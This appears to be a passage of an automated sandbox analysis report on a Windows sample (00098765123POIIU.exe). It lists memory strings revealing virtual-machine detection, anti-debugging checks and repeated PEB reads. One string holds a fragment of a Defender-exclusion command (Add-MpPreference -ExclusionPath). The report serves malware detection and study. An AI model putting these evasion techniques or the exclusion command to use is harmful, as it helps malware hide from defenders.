Source: explorer.exe, 00000004.00000000.361375592.0000000008540000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.355275681.00000000062E0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.360281014.00000000083E9000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: 00098765123POIIU.exe, 00000000.00000002.337921223.00000000032B0000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.360176845.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000000.360318060.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000004.00000002.610146595.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000004.00000000.341318764.000000000095C000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_004088A0 rdtsc 3_2_004088A0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00409B10 LdrLoadDll, 3_2_00409B10
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA58EC mov eax, dword ptr fs:[00000030h] 3_2_00FA58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h] 3_2_00FA40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h] 3_2_00FA40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA40E1 mov eax, dword ptr fs:[00000030h] 3_2_00FA40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDF0BF mov ecx, dword ptr fs:[00000030h] 3_2_00FDF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDF0BF mov eax, dword ptr fs:[00000030h] 3_2_00FDF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDF0BF mov eax, dword ptr fs:[00000030h] 3_2_00FDF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE90AF mov eax, dword ptr fs:[00000030h] 3_2_00FE90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD20A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9080 mov eax, dword ptr fs:[00000030h] 3_2_00FA9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h] 3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h] 3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h] 3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010649A4 mov eax, dword ptr fs:[00000030h] 3_2_010649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010269A6 mov eax, dword ptr fs:[00000030h] 3_2_010269A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC0050 mov eax, dword ptr fs:[00000030h] 3_2_00FC0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC0050 mov eax, dword ptr fs:[00000030h] 3_2_00FC0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h] 3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h] 3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h] 3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010251BE mov eax, dword ptr fs:[00000030h] 3_2_010251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h] 3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h] 3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h] 3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h] 3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD002D mov eax, dword ptr fs:[00000030h] 3_2_00FD002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h] 3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h] 3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h] 3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBB02A mov eax, dword ptr fs:[00000030h] 3_2_00FBB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010341E8 mov eax, dword ptr fs:[00000030h] 3_2_010341E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01074015 mov eax, dword ptr fs:[00000030h] 3_2_01074015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01074015 mov eax, dword ptr fs:[00000030h] 3_2_01074015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027016 mov eax, dword ptr fs:[00000030h] 3_2_01027016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027016 mov eax, dword ptr fs:[00000030h] 3_2_01027016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027016 mov eax, dword ptr fs:[00000030h] 3_2_01027016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00FAB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00FAB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAB1E1 mov eax, dword ptr fs:[00000030h] 3_2_00FAB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD61A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD61A0 mov eax, dword ptr fs:[00000030h] 3_2_00FD61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2990 mov eax, dword ptr fs:[00000030h] 3_2_00FD2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01071074 mov eax, dword ptr fs:[00000030h] 3_2_01071074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01062073 mov eax, dword ptr fs:[00000030h] 3_2_01062073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA185 mov eax, dword ptr fs:[00000030h] 3_2_00FDA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCC182 mov eax, dword ptr fs:[00000030h] 3_2_00FCC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01023884 mov eax, dword ptr fs:[00000030h] 3_2_01023884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01023884 mov eax, dword ptr fs:[00000030h] 3_2_01023884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAB171 mov eax, dword ptr fs:[00000030h] 3_2_00FAB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAB171 mov eax, dword ptr fs:[00000030h] 3_2_00FAB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAC962 mov eax, dword ptr fs:[00000030h] 3_2_00FAC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCB944 mov eax, dword ptr fs:[00000030h] 3_2_00FCB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCB944 mov eax, dword ptr fs:[00000030h] 3_2_00FCB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD513A mov eax, dword ptr fs:[00000030h] 3_2_00FD513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD513A mov eax, dword ptr fs:[00000030h] 3_2_00FD513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov ecx, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103B8D0 mov eax, dword ptr fs:[00000030h] 3_2_0103B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h] 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h] 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h] 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 mov eax, dword ptr fs:[00000030h] 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC4120 mov ecx, dword ptr fs:[00000030h] 3_2_00FC4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h] 3_2_00FA9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h] 3_2_00FA9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9100 mov eax, dword ptr fs:[00000030h] 3_2_00FA9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2AE4 mov eax, dword ptr fs:[00000030h] 3_2_00FD2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106131B mov eax, dword ptr fs:[00000030h] 3_2_0106131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2ACB mov eax, dword ptr fs:[00000030h] 3_2_00FD2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00FBAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBAAB0 mov eax, dword ptr fs:[00000030h] 3_2_00FBAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDFAB0 mov eax, dword ptr fs:[00000030h] 3_2_00FDFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078B58 mov eax, dword ptr fs:[00000030h] 3_2_01078B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h] 3_2_00FA52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDD294 mov eax, dword ptr fs:[00000030h] 3_2_00FDD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDD294 mov eax, dword ptr fs:[00000030h] 3_2_00FDD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE927A mov eax, dword ptr fs:[00000030h] 3_2_00FE927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105D380 mov ecx, dword ptr fs:[00000030h] 3_2_0105D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106138A mov eax, dword ptr fs:[00000030h] 3_2_0106138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01075BA5 mov eax, dword ptr fs:[00000030h] 3_2_01075BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h] 3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h] 3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h] 3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h] 3_2_00FA9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010253CA mov eax, dword ptr fs:[00000030h] 3_2_010253CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010253CA mov eax, dword ptr fs:[00000030h] 3_2_010253CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE4A2C mov eax, dword ptr fs:[00000030h] 3_2_00FE4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE4A2C mov eax, dword ptr fs:[00000030h] 3_2_00FE4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC3A1C mov eax, dword ptr fs:[00000030h] 3_2_00FC3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h] 3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA5210 mov ecx, dword ptr fs:[00000030h] 3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h] 3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h] 3_2_00FA5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAAA16 mov eax, dword ptr fs:[00000030h] 3_2_00FAAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAAA16 mov eax, dword ptr fs:[00000030h] 3_2_00FAAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB8A0A mov eax, dword ptr fs:[00000030h] 3_2_00FB8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106AA16 mov eax, dword ptr fs:[00000030h] 3_2_0106AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106AA16 mov eax, dword ptr fs:[00000030h] 3_2_0106AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCDBE9 mov eax, dword ptr fs:[00000030h] 3_2_00FCDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h] 3_2_00FD4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h] 3_2_00FD4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h] 3_2_00FD4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106EA55 mov eax, dword ptr fs:[00000030h] 3_2_0106EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01034257 mov eax, dword ptr fs:[00000030h] 3_2_01034257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105B260 mov eax, dword ptr fs:[00000030h] 3_2_0105B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105B260 mov eax, dword ptr fs:[00000030h] 3_2_0105B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078A62 mov eax, dword ptr fs:[00000030h] 3_2_01078A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2397 mov eax, dword ptr fs:[00000030h] 3_2_00FD2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDB390 mov eax, dword ptr fs:[00000030h] 3_2_00FDB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB1B8F mov eax, dword ptr fs:[00000030h] 3_2_00FB1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB1B8F mov eax, dword ptr fs:[00000030h] 3_2_00FB1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD3B7A mov eax, dword ptr fs:[00000030h] 3_2_00FD3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD3B7A mov eax, dword ptr fs:[00000030h] 3_2_00FD3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FADB60 mov ecx, dword ptr fs:[00000030h] 3_2_00FADB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAF358 mov eax, dword ptr fs:[00000030h] 3_2_00FAF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FADB40 mov eax, dword ptr fs:[00000030h] 3_2_00FADB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078D34 mov eax, dword ptr fs:[00000030h] 3_2_01078D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0102A537 mov eax, dword ptr fs:[00000030h] 3_2_0102A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106E539 mov eax, dword ptr fs:[00000030h] 3_2_0106E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01023540 mov eax, dword ptr fs:[00000030h] 3_2_01023540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01053D40 mov eax, dword ptr fs:[00000030h] 3_2_01053D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB849B mov eax, dword ptr fs:[00000030h] 3_2_00FB849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC746D mov eax, dword ptr fs:[00000030h] 3_2_00FC746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010705AC mov eax, dword ptr fs:[00000030h] 3_2_010705AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010705AC mov eax, dword ptr fs:[00000030h] 3_2_010705AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA44B mov eax, dword ptr fs:[00000030h] 3_2_00FDA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov ecx, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDBC2C mov eax, dword ptr fs:[00000030h] 3_2_00FDBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0106FDE2
